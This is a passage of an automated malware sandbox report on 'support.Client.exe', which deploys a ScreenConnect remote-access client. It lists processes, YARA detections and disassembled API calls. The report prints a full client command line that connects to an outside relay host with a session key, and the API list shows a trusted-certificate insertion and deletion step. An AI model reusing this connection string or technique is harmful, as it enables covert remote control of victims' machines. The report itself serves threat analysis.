00 35 00 b0 01 82 03 01 Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5

Target ID:	0
Start time:	19:02:56
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\support.Client.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\support.Client.exe"
Imagebase:	0xad0000
File size:	83'320 bytes
MD5 hash:	7989214071F7728A9A0D54C29D62D88D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:02:57
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase:	0x1ac33300000
File size:	24'856 bytes
MD5 hash:	B4088F44B80D363902E11F897A7BAC09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3548401601.000001AC35347000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	19:02:57
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	19:03:24
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe"
Imagebase:	0xc30000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000002.1985585178.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:03:25
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1"
Imagebase:	0xa90000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:03:25
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1"
Imagebase:	0xa90000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	19:03:26
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe" "RunRole" "b56709e0-433a-4670-b1b3-7d84b1644fec" "User"
Imagebase:	0xc0000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	19:03:37
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:03:37
Start date:	04/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7040 -ip 7040
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:03:37
Start date:	04/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 692
Imagebase:	0x260000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	1462
Total number of Limit Nodes:	4

Executed Functions

Function 00AD1000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000000,00000104), ref: 00AD1016
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00AD1025
CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00AD1032
LocalAlloc.KERNELBASE(00000000,00040000), ref: 00AD1057
LocalAlloc.KERNEL32(00000000,00040000), ref: 00AD1063
CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00AD1082
CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00AD10B2
LocalAlloc.KERNEL32(00000000,?), ref: 00AD10C5
LocalAlloc.KERNEL32(00000000,00002000), ref: 00AD10F4
CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00AD110A
CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00AD111A
CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00AD112D
CertFreeCertificateContext.CRYPT32(00000000), ref: 00AD1134
LocalFree.KERNEL32(00000000), ref: 00AD113E
LocalFree.KERNEL32(00000000), ref: 00AD115D
CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00AD116E
CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00AD1182
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00AD1198
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00AD11A9
LoadLibraryA.KERNELBASE(dfshim), ref: 00AD11BA
GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00AD11C6
Sleep.KERNELBASE(00009C40), ref: 00AD11E8
CertDeleteCertificateFromStore.CRYPT32(?), ref: 00AD120B
CertCloseStore.CRYPT32(?,00000000), ref: 00AD121A
LocalFree.KERNEL32(?), ref: 00AD1223
LocalFree.KERNEL32(?), ref: 00AD1228
LocalFree.KERNEL32(?), ref: 00AD122D

Strings

1.3.6.1.4.1.311.4.1.1, xrefs: 00AD1193, 00AD11A4
ShOpenVerbApplicationW, xrefs: 00AD11C0
TrustedPublisher, xrefs: 00AD102B
dfshim, xrefs: 00AD11B5

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
API String ID: 335784236-860318880
Opcode ID: a1aabe7cffbb6786c1b16f8fa7d5144c009eb4c5c5982ec7d0525ca601018522
Instruction ID: bcc4c1bd4d939aa53a153c31edf37511e2cb22a16f3b35fa4358366052b62a14
Opcode Fuzzy Hash: a1aabe7cffbb6786c1b16f8fa7d5144c009eb4c5c5982ec7d0525ca601018522
Instruction Fuzzy Hash: 6A613A71A51218FBEB209BD0DC45FAFBBB5FF48B50F15011AFA16A6290CB7199018BA4

Non-executed Functions

Function 00AD191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AD192B
IsDebuggerPresent.KERNEL32 ref: 00AD19F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AD1A10
UnhandledExceptionFilter.KERNEL32(?), ref: 00AD1A1A

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 7c02f45b5af3bf4abf609f02be7829d10f27a98c927ecbc78763cf79c2517f58
Instruction ID: 364af452ad67014924a0abadebdf6299403d9ec2f34784faf64eac1b2b58736e
Opcode Fuzzy Hash: 7c02f45b5af3bf4abf609f02be7829d10f27a98c927ecbc78763cf79c2517f58
Instruction Fuzzy Hash: 3831E8B5D01218DBDF21EFA4D9497CDBBB8AF08300F1041AAE50DAB350EB759A85CF55

Function 00AD4573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AD466B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AD4675
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD4682

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 43970676fb35f26b32fa300f3b394f2dea7144de4380ee5a5fa16d70f570d70f
Instruction ID: 8a2fe68f1e230a23d4c69cce598a9b472d73e67ff043b932dd5ee3dcfac19df0
Opcode Fuzzy Hash: 43970676fb35f26b32fa300f3b394f2dea7144de4380ee5a5fa16d70f570d70f
Instruction Fuzzy Hash: 4B31C274911228ABCB21DF64DD89BCDBBB8BF08310F5041EAE81DA7250EB749F858F55

Function 00AD3677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00AD364D,?,00AE02E0,0000000C,00AD37A4,?,00000002,00000000,?,00AD3F66,00000003,00AD209F,00AD1AFC), ref: 00AD3698
TerminateProcess.KERNEL32(00000000,?,00AD364D,?,00AE02E0,0000000C,00AD37A4,?,00000002,00000000,?,00AD3F66,00000003,00AD209F,00AD1AFC), ref: 00AD369F
ExitProcess.KERNEL32 ref: 00AD36B1

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3522823e5a487a9bee0888c048082df1353718dd090ec4dd27d7373520de22f3
Instruction ID: ce89fbeaf4ebbc874b0270c9df3429760702236b3089724e0c59ac224d291bfb
Opcode Fuzzy Hash: 3522823e5a487a9bee0888c048082df1353718dd090ec4dd27d7373520de22f3
Instruction Fuzzy Hash: 2DE04632021108EFCF11AFA4CE09A4E3B69EF40341B014016FA078A331EB35DE42DA60

Function 00ADA495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ADA490,?,?,00000008,?,?,00ADA130,00000000), ref: 00ADA6C2

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 58200ddfa6d6678828fad8077caeccf9158b229a6b2dcee74a9bfe9d1766bc0d
Instruction ID: 4fb5512f57a0e2397edb5cb0c1ef4aee6f382ab05d3df79a06f34f01a313fc00
Opcode Fuzzy Hash: 58200ddfa6d6678828fad8077caeccf9158b229a6b2dcee74a9bfe9d1766bc0d
Instruction Fuzzy Hash: 19B12735610608DFD715CF28C48AB647BA0FF55364F298659E89ACF3A1C335E992CB41

Function 00AD1BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AD1BEA

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: b0652de51ad71383c76f88ce3893a699a35e7dbc5ded7a7c02339e0900de9e28
Instruction ID: 54e88165300716962f1c3724fa8ad5043ae0011cf075b0c393b8289b8c65a1da
Opcode Fuzzy Hash: b0652de51ad71383c76f88ce3893a699a35e7dbc5ded7a7c02339e0900de9e28
Instruction Fuzzy Hash: 54516DB1E106659BDB25CFA9D8C57AEBBF1FB48354F14802AD406EB350E3749A42CF50

Function 00AD1AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00AD1300), ref: 00AD1AB1

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3cae1b610173389dcf6df05a420b7eecdf74ac20481b8fb9877902a3b71b08c6
Instruction ID: fa269804c9360acfae909a54702f61d8e03dda060c769b0daf878d9564322198
Opcode Fuzzy Hash: 3cae1b610173389dcf6df05a420b7eecdf74ac20481b8fb9877902a3b71b08c6
Instruction Fuzzy Hash:

Function 00AD6893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00AD6893

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 7a7a72f2c456a131d657488f88774874b4156bc1d27e7956fa985460c59db1b2
Instruction ID: ca0d8cad3b1f6de03e5cb9ef6752325d34fa1c4388ab0ffee0777102171bc6c5
Opcode Fuzzy Hash: 7a7a72f2c456a131d657488f88774874b4156bc1d27e7956fa985460c59db1b2
Instruction Fuzzy Hash: 16A02430301105CF4300CF705FC530C37DC5500FC070301157005C4030D73040415F11

Function 00AD6507 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 00AD654B

Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD6095
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD60A7
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD60B9
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD60CB
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD60DD
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD60EF
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD6101
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD6113
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD6125
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD6137
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD6149
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD615B
Part of subcall function 00AD6078: _free.LIBCMT ref: 00AD616D

_free.LIBCMT ref: 00AD6540

Part of subcall function 00AD4869: HeapFree.KERNEL32(00000000,00000000,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?), ref: 00AD487F
Part of subcall function 00AD4869: GetLastError.KERNEL32(?,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?,?), ref: 00AD4891

_free.LIBCMT ref: 00AD6562
_free.LIBCMT ref: 00AD6577
_free.LIBCMT ref: 00AD6582
_free.LIBCMT ref: 00AD65A4
_free.LIBCMT ref: 00AD65B7
_free.LIBCMT ref: 00AD65C5
_free.LIBCMT ref: 00AD65D0
_free.LIBCMT ref: 00AD6608
_free.LIBCMT ref: 00AD660F
_free.LIBCMT ref: 00AD662C
_free.LIBCMT ref: 00AD6644

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 64cba75cf579615772c420f35e77b013b00d8978d138d0d09afe27722f89b214
Instruction ID: 94506d4d294cec3a6894ecb68966b148063a9e628cca12bda23349a6ca1cf7b3
Opcode Fuzzy Hash: 64cba75cf579615772c420f35e77b013b00d8978d138d0d09afe27722f89b214
Instruction Fuzzy Hash: 9A3149716002409FEB64AB7AE905B9AB7E8EF44350F14452BF05BD7391DE35ED809B60

Function 00AD4330 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00AD4344

Part of subcall function 00AD4869: HeapFree.KERNEL32(00000000,00000000,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?), ref: 00AD487F
Part of subcall function 00AD4869: GetLastError.KERNEL32(?,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?,?), ref: 00AD4891

_free.LIBCMT ref: 00AD4350
_free.LIBCMT ref: 00AD435B
_free.LIBCMT ref: 00AD4366
_free.LIBCMT ref: 00AD4371
_free.LIBCMT ref: 00AD437C
_free.LIBCMT ref: 00AD4387
_free.LIBCMT ref: 00AD4392
_free.LIBCMT ref: 00AD439D
_free.LIBCMT ref: 00AD43AB

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a9dea9e1f5dc303a1c6205f7f2652dfea12a919473e122cc638ca3c9c37ec04f
Instruction ID: e8457572bdc74343a1f8883a8c5607fdcad2e3b3e55897d01a10272c393cffc1
Opcode Fuzzy Hash: a9dea9e1f5dc303a1c6205f7f2652dfea12a919473e122cc638ca3c9c37ec04f
Instruction Fuzzy Hash: 4411B976610148FFDB41EF96DA42CDD3B75EF48790F0141A7B91A4F262DA31DE50AB80

Function 00AD7AB4 Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00AD54C8,00000000,?,?,?,00AD7D05,?,?,00000100), ref: 00AD7B0E
__alloca_probe_16.LIBCMT ref: 00AD7B46
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AD7D05,?,?,00000100,5EFC4D8B,?,?), ref: 00AD7B94
__alloca_probe_16.LIBCMT ref: 00AD7C2B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AD7C8E
__freea.LIBCMT ref: 00AD7C9B

Part of subcall function 00AD62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AD7E5B,?,00000000,?,00AD686F,?,00000004,00000000,?,?,?,00AD3BCD), ref: 00AD6331

__freea.LIBCMT ref: 00AD7CA4
__freea.LIBCMT ref: 00AD7CC9

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: a9ee2a87e0f7f5cb6665dff8015599bb15083ab8797c731aa1c9d1c3efc9e71c
